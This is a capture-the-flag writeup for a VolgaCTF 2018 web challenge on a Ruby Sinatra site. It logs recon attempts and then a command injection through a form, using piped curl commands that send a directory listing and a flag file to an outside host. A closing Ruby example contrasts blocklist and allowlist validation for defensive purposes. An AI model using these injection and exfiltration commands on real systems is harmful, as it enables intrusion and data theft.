External Service Interaction (HTTP, DNS, etc)

Volga 2018 - Old Government Site

Problem

URI variations:

http://old-government-site.quals.2018.volgactf.ru:8080/
http://old-government-site.quals.2018.volgactf.ru:8080/?page=2

Attack attempts

  • Burp w/ Dirbuster wordlist
  • Burp scanner
  • Burp intruder all attack

Results:

None

Error:

>
GET /page?id=%oa%20ping%20-n%2030%20127%2e0%2e0%2e1%20%0a HTTP/1.1
Host: old-government-site.quals.2018.volgactf.ru:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://old-government-site.quals.2018.volgactf.ru:8080/
Cookie: _ga=GA1.2.486151065.1521859898; _gid=GA1.2.1333911552.1521859898
Connection: close
Upgrade-Insecure-Requests: 1

<
HTTP/1.1 400 Bad Request 
Content-Type: text/html;charset=utf-8
Content-Length: 91
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Server: WEBrick/1.3.1 (Ruby/2.3.1/2016-04-26)
Date: Sun, 25 Mar 2018 04:13:32 GMT
Connection: close

Invalid query parameters: invalid %-encoding (%oa%20ping%20-n%2030%20127%2e0%2e0%2e1%20%0a)

If 404:

Sinatra doesn’t know this ditty.
Try this:

get '/.git/' do
  "Hello World"
end

Technology used:

Ruby Sinatra

Related vulnerabilities:

DOS

http://cryptologie.net/article/276/cve-tomek?utm_content=buffer3f597&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer

Session

https://www.reddit.com/r/netsec/comments/639myb/exploiting_a_weak_session_secret_in_a_sinatrarack/

SSRF

https://stackoverflow.com/questions/8618607/how-can-i-get-sinatra-to-set-the-content-length-based-on-a-static-files-size

Attack attempts

  • Number
Found URI /?page=18

On that page there is a form which, when filled in, shows either "error" or "validated" as output.

../ validated
% error

Exploiting External Service Interaction over HTTP

| curl yanapermana.com --data " $(ls | tr '\n' ' ') "
| curl -X POST -d @../../flag yanapermana.com
grep -rnw '/' -e 'Volga'
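The form observation above ("../" passes as validated, "%" errors) and the curl pipeline that followed describe the same root cause: a blocklist that rejects one character while the value still reaches a shell. The following is an added example, not code from the challenge or the writeup, reconstructing that weak check beside a hardened handler. The blocklist logic is a hypothesis based on the two observed outputs; the page file name, directory and function names are assumptions. The hardened version applies an allowlist first, confines the path to a base directory, and executes the external command as an argv array through Open3 so no shell ever parses the value.

```ruby
require 'open3'
require 'tmpdir'

# Hypothetical blocklist reconstructed from the page: "../" -> validated,
# "%" -> error. Nothing stops "|", ";", backticks or a newline.
def blocklist_validate(input)
  input.include?('%') ? 'error' : 'validated'
end

# Allowlist: a page selector is a short positive integer, nothing else.
def allowlist_validate(input)
  input.match?(/\A[1-9][0-9]{0,3}\z/) ? 'validated' : 'error'
end

# Characters that let an interpolated value start a second shell command.
def shell_metachar?(input)
  input.match?(/[|;&`$\n\r<>()]/)
end

# The vulnerable pattern, returned as text only (never executed here): once the
# value is interpolated into a shell string, "| curl ..." becomes a pipeline.
def vulnerable_command_string(input)
  "cat pages/#{input}.txt"
end

# Hardened handler: allowlist, path confinement, then Open3 with an argv array
# (no shell involved, so metacharacters in the value have no meaning).
def safe_read_page(input, base_dir)
  return nil unless allowlist_validate(input) == 'validated'
  path = File.expand_path("#{input}.txt", base_dir)
  return nil unless path.start_with?(File.join(base_dir, ''))
  out, status = Open3.capture2('cat', path)
  status.success? ? out : nil
end

# Self-contained demo: a constructed page file in a temporary directory.
def demo
  Dir.mktmpdir do |dir|
    File.write(File.join(dir, '18.txt'), "page 18 body\n")
    {
      benign: safe_read_page('18', dir),
      injection: safe_read_page('| curl example.invalid --data x', dir),
      traversal: safe_read_page('../18', dir),
    }
  end
end

if __FILE__ == $PROGRAM_NAME
  payload = '| curl example.invalid --data x'
  puts "blocklist says: #{blocklist_validate(payload)}"      # validated
  puts "allowlist says: #{allowlist_validate(payload)}"      # error
  puts "would run: #{vulnerable_command_string(payload)}"
  p demo
end
```

The contrast worth keeping in mind: the blocklist accepts the exact payload shape used in the writeup, while the allowlist never lets it reach a command at all. Even with the allowlist in place, passing arguments as an array rather than a string is the change that removes the shell from the picture, so a future bypass of the validator does not become command execution.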

References
